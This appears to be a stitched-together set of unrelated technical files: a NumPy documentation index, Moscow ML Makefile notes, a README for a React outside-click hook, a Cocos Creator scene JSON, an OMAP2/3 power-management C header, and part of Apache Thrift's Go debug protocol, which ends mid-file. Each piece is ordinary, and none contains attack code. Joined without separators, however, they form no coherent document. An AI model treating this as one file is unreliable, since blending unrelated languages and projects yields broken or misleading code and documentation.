Miscellaneous routines
**********************
.. toctree::
.. currentmodule:: numpy
Performance tuning
------------------
.. autosummary::
:toctree: generated/
setbufsize
getbufsize
Memory ranges
-------------
.. autosummary::
:toctree: generated/
shares_memory
may_share_memory
byte_bounds
Array mixins
------------
.. autosummary::
:toctree: generated/
lib.mixins.NDArrayOperatorsMixin
NumPy version comparison
------------------------
.. autosummary::
:toctree: generated/
lib.NumpyVersion
Utility
-------
.. autosummary::
:toctree: generated/
get_include
show_config
deprecate
deprecate_with_doc
Matlab-like Functions
---------------------
.. autosummary::
:toctree: generated/
who
disp
The Unix Makefile defines the following targets, which may be useful to hackers:

make regress - builds the libraries in ../mosmllib and runs the test-suites
               in test/ ../mosmllib/test/ ../test/ (by calling make current)
               using the current compiler (the one in this directory).
               Useful for testing prior to bootstrapping.

make promote - promotes the current binaries of the linker, compiler and toplevel
               to ../, backing up the supplied originals in ../*.orig.
               Use this prior to bootstrapping the compiler, provided the runtime
               is unchanged.

make revert  - restores the linker, compiler and lexer originals (saved by make promote).
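
For illustration only, a bootstrap round built on these targets might look like the
following sketch (the bare make rebuild step and its placement are an assumption,
not something the notes above prescribe):

    make regress    # build ../mosmllib and run the test suites with the compiler in this directory
    make promote    # install the new linker, compiler and toplevel in ../, keeping the originals as ../*.orig
    make            # (assumed) rebuild this directory with the promoted binaries, i.e. the bootstrap proper
    make regress    # re-run the test suites against the bootstrapped compiler
    make revert     # if anything breaks, restore the originals saved by make promote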
# @rooks/use-outside-click-ref
### A hook that can track a click event outside a ref. Returns a callbackRef.
    
<a href="https://spectrum.chat/rooks"><img src="https://withspectrum.github.io/badge/badge.svg" alt="Join the community on Spectrum"/></a>
### Installation
```
npm install --save @rooks/use-outside-click-ref
```
### Importing the hook
```javascript
import useOutsideClickRef from "@rooks/use-outside-click-ref"
```
### Usage
```jsx
function Demo() {
  function outsidePClick() {
    alert("Clicked outside p");
  }
  const [ref] = useOutsideClickRef(outsidePClick);
  return (
    <div>
      <p ref={ref}>Click outside me</p>
    </div>
  );
}

render(<Demo />);
```
[
{
"__type__": "cc.SceneAsset",
"_name": "",
"_objFlags": 0,
"scene": {
"__id__": 1
}
},
{
"__type__": "cc.Scene",
"_name": "",
"_objFlags": 0,
"_opacity": 255,
"_color": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_cascadeOpacityEnabled": true,
"_parent": null,
"_anchorPoint": {
"__type__": "cc.Vec2",
"x": 0,
"y": 0
},
"_contentSize": {
"__type__": "cc.Size",
"width": 0,
"height": 0
},
"_children": [
{
"__id__": 2
},
{
"__id__": 11
}
],
"_localZOrder": 0,
"_globalZOrder": 0,
"_tag": -1,
"_opacityModifyRGB": false,
"_reorderChildDirty": false,
"_id": "8f24fd7b-5a5a-412a-9eda-801253200f07"
},
{
"__type__": "cc.Node",
"_name": "Canvas",
"_objFlags": 0,
"_opacity": 255,
"_color": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_cascadeOpacityEnabled": true,
"_parent": {
"__id__": 1
},
"_anchorPoint": {
"__type__": "cc.Vec2",
"x": 0.5,
"y": 0.5
},
"_contentSize": {
"__type__": "cc.Size",
"width": 960,
"height": 640
},
"_children": [
{
"__id__": 3
}
],
"_rotationX": 0,
"_rotationY": 0,
"_scaleX": 1,
"_scaleY": 1,
"_position": {
"__type__": "cc.Vec2",
"x": 480,
"y": 320
},
"_skewX": 0,
"_skewY": 0,
"_localZOrder": 0,
"_globalZOrder": 0,
"_tag": -1,
"_opacityModifyRGB": false,
"_reorderChildDirty": false,
"_id": "88b07iG++9GSK3qDtTpsdas",
"_active": true,
"_components": [
{
"__id__": 10
}
],
"_prefab": null
},
{
"__type__": "cc.Node",
"_name": "center",
"_objFlags": 0,
"_opacity": 255,
"_color": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_cascadeOpacityEnabled": true,
"_parent": {
"__id__": 2
},
"_anchorPoint": {
"__type__": "cc.Vec2",
"x": 0.5,
"y": 0.5
},
"_contentSize": {
"__type__": "cc.Size",
"width": 0,
"height": 0
},
"_children": [
{
"__id__": 4
},
{
"__id__": 6
}
],
"_rotationX": 0,
"_rotationY": 0,
"_scaleX": 1,
"_scaleY": 1,
"_position": {
"__type__": "cc.Vec2",
"x": 0,
"y": 0
},
"_skewX": 0,
"_skewY": 0,
"_localZOrder": 0,
"_globalZOrder": 0,
"_tag": -1,
"_opacityModifyRGB": false,
"_reorderChildDirty": false,
"_id": "cc249bILydDI40VyDCwf/UH",
"_active": true,
"_components": [
{
"__id__": 9
}
],
"_prefab": null
},
{
"__type__": "cc.Node",
"_name": "Title",
"_objFlags": 0,
"_opacity": 255,
"_color": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_cascadeOpacityEnabled": true,
"_parent": {
"__id__": 3
},
"_anchorPoint": {
"__type__": "cc.Vec2",
"x": 0.5,
"y": 0.5
},
"_contentSize": {
"__type__": "cc.Size",
"width": 200.12,
"height": 40
},
"_children": [],
"_rotationX": 0,
"_rotationY": 0,
"_scaleX": 1,
"_scaleY": 1,
"_position": {
"__type__": "cc.Vec2",
"x": 0,
"y": 248
},
"_skewX": 0,
"_skewY": 0,
"_localZOrder": 0,
"_globalZOrder": 0,
"_tag": -1,
"_opacityModifyRGB": false,
"_reorderChildDirty": false,
"_id": "48067fgVzVLP6Q6Ntyx7l0B",
"_active": true,
"_components": [
{
"__id__": 5
}
],
"_prefab": null
},
{
"__type__": "cc.Label",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 4
},
"_enabled": true,
"_useOriginalSize": false,
"_fontSize": 40,
"_lineHeight": 40,
"_enableWrapText": true,
"_isSystemFontUsed": true,
"_N$string": "Disco 2000",
"_N$horizontalAlign": 1,
"_N$verticalAlign": 1,
"_N$overflow": 0
},
{
"__type__": "cc.Node",
"_name": "CircleEffect",
"_objFlags": 0,
"_opacity": 255,
"_color": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_cascadeOpacityEnabled": true,
"_parent": {
"__id__": 3
},
"_anchorPoint": {
"__type__": "cc.Vec2",
"x": 0.5,
"y": 0.5
},
"_contentSize": {
"__type__": "cc.Size",
"width": 800,
"height": 480
},
"_children": [],
"_rotationX": 0,
"_rotationY": 0,
"_scaleX": 1,
"_scaleY": 1,
"_position": {
"__type__": "cc.Vec2",
"x": 0,
"y": -39
},
"_skewX": 0,
"_skewY": 0,
"_localZOrder": 0,
"_globalZOrder": 0,
"_tag": -1,
"_opacityModifyRGB": false,
"_reorderChildDirty": false,
"_id": "c1172F3GHdNb5JDS/IF8jaj",
"_active": true,
"_components": [
{
"__id__": 7
},
{
"__id__": 8
}
],
"_prefab": null
},
{
"__type__": "cc.Sprite",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 6
},
"_enabled": true,
"_spriteFrame": {
"__uuid__": "a23235d1-15db-4b95-8439-a2e005bfff91"
},
"_type": 0,
"_sizeMode": 0,
"_fillType": 0,
"_fillCenter": {
"__type__": "cc.Vec2",
"x": 0,
"y": 0
},
"_fillStart": 0,
"_fillRange": 0,
"_isTrimmedMode": true,
"_srcBlendFactor": 770,
"_dstBlendFactor": 771,
"_atlas": null
},
{
"__type__": "ec0bddz0EhL45aBJr4t9QLx",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 6
},
"_enabled": true,
"glassFactor": 1,
"flagShader": "Effect72.fs.glsl",
"frag_glsl": "Effect10.fs.glsl"
},
{
"__type__": "cc.Widget",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 3
},
"_enabled": true,
"isAlignOnce": false,
"_alignFlags": 18,
"_left": 0,
"_right": 0,
"_top": 0,
"_bottom": 0,
"_isAbsLeft": true,
"_isAbsRight": true,
"_isAbsTop": true,
"_isAbsBottom": true,
"_originalWidth": 0,
"_originalHeight": 0
},
{
"__type__": "cc.Canvas",
"_name": "",
"_objFlags": 1835008,
"node": {
"__id__": 2
},
"_enabled": true,
"_designResolution": {
"__type__": "cc.Size",
"width": 960,
"height": 640
},
"_fitWidth": false,
"_fitHeight": true
},
{
"__type__": "cc.Node",
"_name": "BtnGroups",
"_objFlags": 0,
"_opacity": 255,
"_color": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_cascadeOpacityEnabled": true,
"_parent": {
"__id__": 1
},
"_anchorPoint": {
"__type__": "cc.Vec2",
"x": 0.5,
"y": 0.5
},
"_contentSize": {
"__type__": "cc.Size",
"width": 0,
"height": 0
},
"_children": [
{
"__id__": 12
},
{
"__id__": 20
}
],
"_rotationX": 0,
"_rotationY": 0,
"_scaleX": 1,
"_scaleY": 1,
"_position": {
"__type__": "cc.Vec2",
"x": 480,
"y": 320
},
"_skewX": 0,
"_skewY": 0,
"_localZOrder": 0,
"_globalZOrder": 0,
"_tag": -1,
"_opacityModifyRGB": false,
"_reorderChildDirty": false,
"_id": "bedabglNy1G4694VND7MKwL",
"_active": true,
"_components": [
{
"__id__": 28
},
{
"__id__": 29
}
],
"_prefab": {
"__id__": 30
}
},
{
"__type__": "cc.Node",
"_name": "ButtonLast",
"_objFlags": 0,
"_opacity": 255,
"_color": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_cascadeOpacityEnabled": true,
"_parent": {
"__id__": 11
},
"_anchorPoint": {
"__type__": "cc.Vec2",
"x": 0.5,
"y": 0.5
},
"_contentSize": {
"__type__": "cc.Size",
"width": 100,
"height": 40
},
"_children": [
{
"__id__": 13
}
],
"_rotationX": 0,
"_rotationY": 0,
"_scaleX": 1,
"_scaleY": 1,
"_position": {
"__type__": "cc.Vec2",
"x": -364,
"y": -269
},
"_skewX": 0,
"_skewY": 0,
"_localZOrder": 0,
"_globalZOrder": 0,
"_tag": -1,
"_opacityModifyRGB": false,
"_reorderChildDirty": false,
"_id": "f48c9Pu/9NAvaVpaqnpkwZ9",
"_active": true,
"_components": [
{
"__id__": 16
},
{
"__id__": 17
}
],
"_prefab": {
"__id__": 19
}
},
{
"__type__": "cc.Node",
"_name": "Label",
"_objFlags": 0,
"_opacity": 255,
"_color": {
"__type__": "cc.Color",
"r": 0,
"g": 0,
"b": 0,
"a": 255
},
"_cascadeOpacityEnabled": true,
"_parent": {
"__id__": 12
},
"_anchorPoint": {
"__type__": "cc.Vec2",
"x": 0.5,
"y": 0.5
},
"_contentSize": {
"__type__": "cc.Size",
"width": 100,
"height": 40
},
"_children": [],
"_rotationX": 0,
"_rotationY": 0,
"_scaleX": 1,
"_scaleY": 1,
"_position": {
"__type__": "cc.Vec2",
"x": 1.1368683772161603e-13,
"y": 0
},
"_skewX": 0,
"_skewY": 0,
"_localZOrder": 0,
"_globalZOrder": 0,
"_tag": -1,
"_opacityModifyRGB": false,
"_reorderChildDirty": false,
"_id": "a9d07YHkrhNrqpNO1gQJ/gw",
"_active": true,
"_components": [
{
"__id__": 14
}
],
"_prefab": {
"__id__": 15
}
},
{
"__type__": "cc.Label",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 13
},
"_enabled": true,
"_useOriginalSize": false,
"_fontSize": 20,
"_lineHeight": 40,
"_enableWrapText": false,
"_isSystemFontUsed": true,
"_N$string": "上一个",
"_N$horizontalAlign": 1,
"_N$verticalAlign": 1,
"_N$overflow": 1
},
{
"__type__": "cc.PrefabInfo",
"root": {
"__id__": 11
},
"asset": {
"__uuid__": "289e5a19-adc5-41d3-b464-6bd29a64f6ae"
},
"fileId": "3d062vcxBtIbbgesrSI+jF3"
},
{
"__type__": "cc.Sprite",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 12
},
"_enabled": true,
"_spriteFrame": {
"__uuid__": "f0048c10-f03e-4c97-b9d3-3506e1d58952"
},
"_type": 1,
"_sizeMode": 0,
"_fillType": 0,
"_fillCenter": {
"__type__": "cc.Vec2",
"x": 0,
"y": 0
},
"_fillStart": 0,
"_fillRange": 0,
"_isTrimmedMode": true,
"_srcBlendFactor": 770,
"_dstBlendFactor": 771,
"_atlas": null
},
{
"__type__": "cc.Button",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 12
},
"_enabled": true,
"transition": 2,
"pressedColor": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"hoverColor": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"duration": 0.1,
"pressedSprite": {
"__uuid__": "e9ec654c-97a2-4787-9325-e6a10375219a"
},
"hoverSprite": {
"__uuid__": "e9ec654c-97a2-4787-9325-e6a10375219a"
},
"clickEvents": [
{
"__id__": 18
}
],
"_N$interactable": true,
"_N$normalColor": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_N$disabledColor": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_N$normalSprite": {
"__uuid__": "f0048c10-f03e-4c97-b9d3-3506e1d58952"
},
"_N$disabledSprite": {
"__uuid__": "29158224-f8dd-4661-a796-1ffab537140e"
},
"_N$target": {
"__id__": 12
}
},
{
"__type__": "cc.ClickEvent",
"target": {
"__id__": 11
},
"component": "EffectManager",
"handler": "onClickLast"
},
{
"__type__": "cc.PrefabInfo",
"root": {
"__id__": 11
},
"asset": {
"__uuid__": "289e5a19-adc5-41d3-b464-6bd29a64f6ae"
},
"fileId": "94c0ftqCdtOJKXlb0+30xhl"
},
{
"__type__": "cc.Node",
"_name": "ButtonNext",
"_objFlags": 0,
"_opacity": 255,
"_color": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_cascadeOpacityEnabled": true,
"_parent": {
"__id__": 11
},
"_anchorPoint": {
"__type__": "cc.Vec2",
"x": 0.5,
"y": 0.5
},
"_contentSize": {
"__type__": "cc.Size",
"width": 100,
"height": 40
},
"_children": [
{
"__id__": 21
}
],
"_rotationX": 0,
"_rotationY": 0,
"_scaleX": 1,
"_scaleY": 1,
"_position": {
"__type__": "cc.Vec2",
"x": 384,
"y": -269
},
"_skewX": 0,
"_skewY": 0,
"_localZOrder": 0,
"_globalZOrder": 0,
"_tag": -1,
"_opacityModifyRGB": false,
"_reorderChildDirty": false,
"_id": "605a0eqMc1GuKpGsbKnM85G",
"_active": true,
"_components": [
{
"__id__": 24
},
{
"__id__": 25
}
],
"_prefab": {
"__id__": 27
}
},
{
"__type__": "cc.Node",
"_name": "Label",
"_objFlags": 0,
"_opacity": 255,
"_color": {
"__type__": "cc.Color",
"r": 0,
"g": 0,
"b": 0,
"a": 255
},
"_cascadeOpacityEnabled": true,
"_parent": {
"__id__": 20
},
"_anchorPoint": {
"__type__": "cc.Vec2",
"x": 0.5,
"y": 0.5
},
"_contentSize": {
"__type__": "cc.Size",
"width": 100,
"height": 40
},
"_children": [],
"_rotationX": 0,
"_rotationY": 0,
"_scaleX": 1,
"_scaleY": 1,
"_position": {
"__type__": "cc.Vec2",
"x": 1.1368683772161603e-13,
"y": 0
},
"_skewX": 0,
"_skewY": 0,
"_localZOrder": 0,
"_globalZOrder": 0,
"_tag": -1,
"_opacityModifyRGB": false,
"_reorderChildDirty": false,
"_id": "c18b6w6gW1DZrWrbF9HB+jE",
"_active": true,
"_components": [
{
"__id__": 22
}
],
"_prefab": {
"__id__": 23
}
},
{
"__type__": "cc.Label",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 21
},
"_enabled": true,
"_useOriginalSize": false,
"_fontSize": 20,
"_lineHeight": 40,
"_enableWrapText": false,
"_isSystemFontUsed": true,
"_N$string": "下一个",
"_N$horizontalAlign": 1,
"_N$verticalAlign": 1,
"_N$overflow": 1
},
{
"__type__": "cc.PrefabInfo",
"root": {
"__id__": 11
},
"asset": {
"__uuid__": "289e5a19-adc5-41d3-b464-6bd29a64f6ae"
},
"fileId": "f5902Qirn9M/6eNkIPfz3B8"
},
{
"__type__": "cc.Sprite",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 20
},
"_enabled": true,
"_spriteFrame": {
"__uuid__": "f0048c10-f03e-4c97-b9d3-3506e1d58952"
},
"_type": 1,
"_sizeMode": 0,
"_fillType": 0,
"_fillCenter": {
"__type__": "cc.Vec2",
"x": 0,
"y": 0
},
"_fillStart": 0,
"_fillRange": 0,
"_isTrimmedMode": true,
"_srcBlendFactor": 770,
"_dstBlendFactor": 771,
"_atlas": null
},
{
"__type__": "cc.Button",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 20
},
"_enabled": true,
"transition": 2,
"pressedColor": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"hoverColor": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"duration": 0.1,
"pressedSprite": {
"__uuid__": "e9ec654c-97a2-4787-9325-e6a10375219a"
},
"hoverSprite": {
"__uuid__": "e9ec654c-97a2-4787-9325-e6a10375219a"
},
"clickEvents": [
{
"__id__": 26
}
],
"_N$interactable": true,
"_N$normalColor": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_N$disabledColor": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_N$normalSprite": {
"__uuid__": "f0048c10-f03e-4c97-b9d3-3506e1d58952"
},
"_N$disabledSprite": {
"__uuid__": "29158224-f8dd-4661-a796-1ffab537140e"
},
"_N$target": {
"__id__": 20
}
},
{
"__type__": "cc.ClickEvent",
"target": {
"__id__": 11
},
"component": "EffectManager",
"handler": "onClickNext"
},
{
"__type__": "cc.PrefabInfo",
"root": {
"__id__": 11
},
"asset": {
"__uuid__": "289e5a19-adc5-41d3-b464-6bd29a64f6ae"
},
"fileId": "f000a4iipBHL7L1JmA630O4"
},
{
"__type__": "10b8cNnro5N0qUG75gHt193",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 11
},
"_enabled": true,
"lastSceneName": "Effect23",
"nextSceneName": "Effect25"
},
{
"__type__": "cc.Widget",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 11
},
"_enabled": true,
"isAlignOnce": false,
"_alignFlags": 18,
"_left": 0,
"_right": 0,
"_top": 0,
"_bottom": 0,
"_isAbsLeft": true,
"_isAbsRight": true,
"_isAbsTop": true,
"_isAbsBottom": true,
"_originalWidth": 0,
"_originalHeight": 0
},
{
"__type__": "cc.PrefabInfo",
"root": {
"__id__": 11
},
"asset": {
"__uuid__": "289e5a19-adc5-41d3-b464-6bd29a64f6ae"
},
"fileId": "83bd0wxsfhOyrAxwCVmeS2q"
}
]
/*
* OMAP2/3 Power Management Routines
*
* Copyright (C) 2008 Nokia Corporation
* Jouni Hogander
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*/
#ifndef __ARCH_ARM_MACH_OMAP2_PM_H
#define __ARCH_ARM_MACH_OMAP2_PM_H
#include <plat/powerdomain.h>
extern u32 enable_off_mode;
extern u32 sleep_while_idle;
extern void *omap3_secure_ram_storage;
extern void omap3_pm_off_mode_enable(int);
extern void omap_sram_idle(void);
extern int omap3_can_sleep(void);
extern int set_pwrdm_state(struct powerdomain *pwrdm, u32 state);
extern int omap3_idle_init(void);
struct cpuidle_params {
u8 valid;
u32 sleep_latency;
u32 wake_latency;
u32 threshold;
};
#if defined(CONFIG_PM) && defined(CONFIG_CPU_IDLE)
extern void omap3_pm_init_cpuidle(struct cpuidle_params *cpuidle_board_params);
#else
static
inline void omap3_pm_init_cpuidle(struct cpuidle_params *cpuidle_board_params)
{
}
#endif
extern int omap3_pm_get_suspend_state(struct powerdomain *pwrdm);
extern int omap3_pm_set_suspend_state(struct powerdomain *pwrdm, int state);
extern u32 wakeup_timer_seconds;
extern u32 wakeup_timer_milliseconds;
extern struct omap_dm_timer *gptimer_wakeup;
#ifdef CONFIG_PM_DEBUG
extern void omap2_pm_dump(int mode, int resume, unsigned int us);
extern int omap2_pm_debug;
#else
#define omap2_pm_dump(mode, resume, us) do {} while (0);
#define omap2_pm_debug 0
#endif
#if defined(CONFIG_CPU_IDLE)
extern void omap3_cpuidle_update_states(void);
#endif
#if defined(CONFIG_PM_DEBUG) && defined(CONFIG_DEBUG_FS)
extern void pm_dbg_update_time(struct powerdomain *pwrdm, int prev);
extern int pm_dbg_regset_save(int reg_set);
extern int pm_dbg_regset_init(int reg_set);
#else
#define pm_dbg_update_time(pwrdm, prev) do {} while (0);
#define pm_dbg_regset_save(reg_set) do {} while (0);
#define pm_dbg_regset_init(reg_set) do {} while (0);
#endif /* CONFIG_PM_DEBUG */
extern void omap24xx_idle_loop_suspend(void);
extern void omap24xx_cpu_suspend(u32 dll_ctrl, void __iomem *sdrc_dlla_ctrl,
void __iomem *sdrc_power);
extern void omap34xx_cpu_suspend(u32 *addr, int save_state);
extern void save_secure_ram_context(u32 *addr);
extern void omap3_save_scratchpad_contents(void);
extern unsigned int omap24xx_idle_loop_suspend_sz;
extern unsigned int omap34xx_suspend_sz;
extern unsigned int save_secure_ram_context_sz;
extern unsigned int omap24xx_cpu_suspend_sz;
extern unsigned int omap34xx_cpu_suspend_sz;
#endif
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package thrift
import (
"log"
)
type TDebugProtocol struct {
Delegate TProtocol
LogPrefix string
}
type TDebugProtocolFactory struct {
Underlying TProtocolFactory
LogPrefix string
}
func NewTDebugProtocolFactory(underlying TProtocolFactory, logPrefix string) *TDebugProtocolFactory {
return &TDebugProtocolFactory{
Underlying: underlying,
LogPrefix: logPrefix,
}
}
func (t *TDebugProtocolFactory) GetProtocol(trans TTransport) TProtocol {
return &TDebugProtocol{
Delegate: t.Underlying.GetProtocol(trans),
LogPrefix: t.LogPrefix,
}
}
func (tdp *TDebugProtocol) WriteMessageBegin(name string, typeId TMessageType, seqid int32) error {
err := tdp.Delegate.WriteMessageBegin(name, typeId, seqid)
log.Printf("%sWriteMessageBegin(name=%#v, typeId=%#v, seqid=%#v) => %#v", tdp.LogPrefix, name, typeId, seqid, err)
return err
}
func (tdp *TDebugProtocol) WriteMessageEnd() error {
err := tdp.Delegate.WriteMessageEnd()
log.Printf("%sWriteMessageEnd() => %#v", tdp.LogPrefix, err)
return err
}
func (tdp *TDebugProtocol) WriteStructBegin(name string) error {
err := tdp.Delegate.WriteStructBegin(name)
log.Printf("%sWriteStructBegin(name=%#v) => %#v", tdp.LogPrefix, name, err)
return err
}
func (tdp *TDebugProtocol) WriteStructEnd() error {
err := tdp.Delegate.WriteStructEnd()
log.Printf("%sWriteStructEnd() => %#v", tdp.LogPrefix, err)
return err
}
func (tdp *TDebugProtocol) WriteFieldBegin(name string, typeId TType, id int16) error {
err := tdp.Delegate.WriteFieldBegin(name, typeId, id)
log.Printf("%sWriteFieldBegin(name=%#v, typeId=%#v, id%#v) => %#v", tdp.LogPrefix, name, typeId, id, err)
return err
}
func (tdp *TDebugProtocol) WriteFieldEnd() error {
err := tdp.Delegate.WriteFieldEnd()
log.Printf("%sWriteFieldEnd() => %#v", tdp.LogPrefix, err)
return err
}
func (tdp *TDebugProtocol) WriteFieldStop() error {
err := tdp.Delegate.WriteFieldStop()
log.Printf("%sWriteFieldStop() => %#v", tdp.LogPrefix, err)
return err
}
func (tdp *TDebugProtocol) WriteMapBegin(keyType TType, valueType TType, size int) error {
err := tdp.Delegate.WriteMapBegin(keyType, valueType, size)
log.Printf("%sWriteMapBegin(keyType=%#v, valueType=%#v, size=%#v) => %#v", tdp.LogPrefix, keyType, valueType, size, err)
return err
}
func (tdp *TDebugProtocol) WriteMapEnd() error {
err := tdp.Delegate.WriteMapEnd()
log.Printf("%sWriteMapEnd() => %#v", tdp.LogPrefix, err)
return err
}
func (tdp *TDebugProtocol) WriteListBegin(elemType TType, size int) error {
err := tdp.Delegate.WriteListBegin(elemType, size)
log.Printf("%sWriteListBegin(elemType=%#v, size=%#v) => %#v", tdp.LogPrefix, elemType, size, err)
return err
}
func (tdp *TDebugProtocol) WriteListEnd() error {
err := tdp.Delegate.WriteListEnd()
log.Printf("%sWriteListEnd() => %#v", tdp.LogPrefix, err)
return err
}
func (tdp *TDebugProtocol) WriteSetBegin(elemType TType, size int) error {
err := tdp.Delegate.WriteSetBegin(elemType, size)
log.Printf("%sWriteSetBegin(elemType=%#v, size=%#v) => %#v", tdp.LogPrefix, elemType, size, err)
return err
}
func (tdp *TDebugProtocol) WriteSetEnd() error {
err := tdp.Delegate.WriteSetEnd()
log.Printf("%sWriteSetEnd() => %#v", tdp.LogPrefix, err)
return err
}
func (tdp *TDebugProtocol) WriteBool(value bool) error {
err := tdp.Delegate.WriteBool(value)
log.Printf("%sWriteBool(value=%#v) => %#v", tdp.LogPrefix, value, err)
return err
}
func (tdp *TDebugProtocol) WriteByte(value byte) error {
err := tdp.Delegate.WriteByte(value)
log.Printf("%sWriteByte(value=%#v) => %#v", tdp.LogPrefix, value, err)
return err
}
func (tdp *TDebugProtocol) WriteI16(value int16) error {
err := tdp.Delegate.WriteI16(value)
log.Printf("%sWriteI16(value=%#v) => %#v", tdp.LogPrefix, value, err)
return err
}
func (tdp *TDebugProtocol) WriteI32(value int32) error {
err := tdp.Delegate.WriteI32(value)
log.Printf("%sWriteI32(value=%#v) => %#v", tdp.LogPrefix, value, err)
return err
}
func (tdp *TDebugProtocol) WriteI64(value int64) error {
err := tdp.Delegate.WriteI64(value)
log.Printf("%sWriteI64(value=%#v) => %#v", tdp.LogPrefix, value, err)
return err
}
func (tdp *TDebugProtocol) WriteDouble(value float64) error {
err := tdp.Delegate.WriteDouble(value)
log.Printf("%sWriteDouble(value=%#v) => %#v", tdp.LogPrefix, value, err)
return err
}
func (tdp *TDebugProtocol) WriteString(value string) error {
err := tdp.Delegate.WriteString(value)
log.Printf("%sWriteString(value=%#v) => %#v", tdp.LogPrefix, value, err)
return err
}
func (tdp *TDebugProtocol) WriteBinary(value []byte) error {
err := tdp.Delegate.WriteBinary(value)
log.Printf("%sWriteBinary(value=%#v) => %#v", tdp.LogPrefix, value, err)
return err
}
func (tdp *TDebugProtocol) ReadMessageBegin() (name string, typeId TMessageType, seqid int32, err error) {
name, typeId, seqid, err = tdp.Delegate.ReadMessageBegin()
log.Printf("%sReadMessageBegin() (name=%#v, typeId=%#v, seqid=%#v, err=%#v)", tdp.LogPrefix, name, typeId, seqid, err)
return
}
func (tdp *TDebugProtocol) ReadMessageEnd() (err error) {
err = tdp.Delegate.ReadMessageEnd()
log.Printf("%sReadMessageEnd() err=%#v", tdp.LogPrefix, err)
return
}
func (tdp *TDebugProtocol) ReadStructBegin() (name string, err error) {
name, err = tdp.Delegate.ReadStructBegin()
log.Printf("%sReadStructBegin() (name%#v, err=%#v)", tdp.LogPrefix, name, err)
return
}
func (tdp *TDebugProtocol) ReadStructEnd() (err error) {
err = tdp.Delegate.ReadStructEnd()
log.Printf("%sReadStructEnd() err=%#v", tdp.LogPrefix, err)
return
}
func (tdp *TDebugProtocol) ReadFieldBegin() (name string, typeId TType, id int16, err error) {
name, typeId, id, err = tdp.Delegate.ReadFieldBegin()
log.Printf("%sReadFieldBegin() (name=%#v, typeId=%#v, id=%#v, err=%#v)", tdp.LogPrefix, name, typeId, id, err)
return
}
func (tdp *TDebugProtocol) ReadFieldEnd() (err error) {
err = tdp.Delegate.ReadFieldEnd()
log.Printf("%sReadFieldEnd() err=%#v", tdp.LogPrefix, err)
return
}
func (tdp *TDebugProtocol) ReadMapBegin() (keyType TType, valueType TType, size int, err error) {
keyType, valueType, size, err = tdp.Delegate.ReadMapBegin()
log.Printf("%sReadMapBegin() (keyType=%#v, valueType=%#v, size=%#v, err=%#v)", tdp.LogPrefix, keyType, valueType, size, err)
return
}
func (tdp *TDebugProtocol) ReadMapEnd() (err error) {
err = tdp.Delegate.ReadMapEnd()
log.Printf("%sReadMapEnd() err=%#v", tdp.LogPrefix, err)
return
}
func (tdp *TDebugProtocol) ReadListBegin() (elemType TType, size int, err error) {
elemType, size, err = tdp.Delegate.ReadListBegin()
log.Printf("%sReadListBegin() (elemType=%#v, size=%#v, err=%#v)", tdp.LogPrefix, elemType, size, err)
return
}
func (tdp *TDebugProtocol) ReadListEnd() (err error) {
err = tdp.Delegate.ReadListEnd()
log.Printf("%sReadListEnd() err=%#v", tdp.LogPrefix, err)
return
}
func (tdp *TDebugProtocol) ReadSetBegin() (elemType TType, size int, err error) {
elemType, size, err = tdp.Delegate.ReadSetBegin()
log.Printf("%sReadSetBegin() (elemType=%#v, size=%#v, err=%#v)", tdp.LogPrefix, elemType, size, err)
return
}
func (tdp *TDebugProtocol) ReadSetEnd() (err error) {
err = tdp.Delegate.ReadSetEnd()
log.Printf("%sReadSetEnd() err=%#v", tdp.LogPrefix, err)
return
}
func (tdp *TDebugProtocol) ReadBool() (value bool, err error) {
value, err = tdp.Delegate.ReadBool()
log.Printf("%sReadBool() (value=%#v, err=%#v)", tdp.LogPrefix, value, err)
return
}
func (tdp *TDebugProtocol) ReadByte() (value byte, err error) {
value, err = tdp.Delegate.ReadByte()
log.Printf("%sReadByte() (value=%#v, err=%#v)", tdp.LogPrefix, value, err)
return
}
func (tdp *TDebugProtocol) ReadI16() (value int16, err error) {
